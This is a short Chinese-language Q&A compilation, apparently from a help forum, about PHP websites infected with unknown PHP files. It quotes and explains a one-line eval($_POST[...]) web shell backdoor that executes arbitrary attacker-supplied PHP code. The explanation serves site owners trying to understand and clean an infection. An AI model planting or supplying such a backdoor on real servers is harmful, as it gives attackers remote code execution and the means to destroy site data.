⑴ php 網站中病毒了 根目錄生成好多php文件,怎麼辦
把你的根目錄設置下許可權,設置成不可寫就行了,然後再逐步排查下你代碼的問題
⑵ 網站里發現大量不正常的PHP文件,應該是病毒,請問這病毒的目的是什麼
這應該是注入PHP文件的木馬,駭客通過url提交參數,在你的伺服器生成他想生成的PHP文件和內容,然後,就可以擁有你網站的執行許可權了
你可以把這幾個文件打個包,上傳成附件,我看下
⑶ 網站中出現<php eval($_POST['posha']);> 這段代碼什麼意思
這是一個典型的後門程序,首先我解釋一下eval函數的作用,
//eval—把字元串作為PHP代碼執行
eval('echo123;');//輸出123
也就是說,所有的字元串放入到eval當中,eval會把字元串解析為php代碼來進行執行,那麼結合$_POST['posha']的話,只要使用post傳輸時在name為posha的值中寫入任何字元串,都可以當做php代碼來執行,這個時候就有點可怕了,比如寫入一段循環刪除整站代碼等等。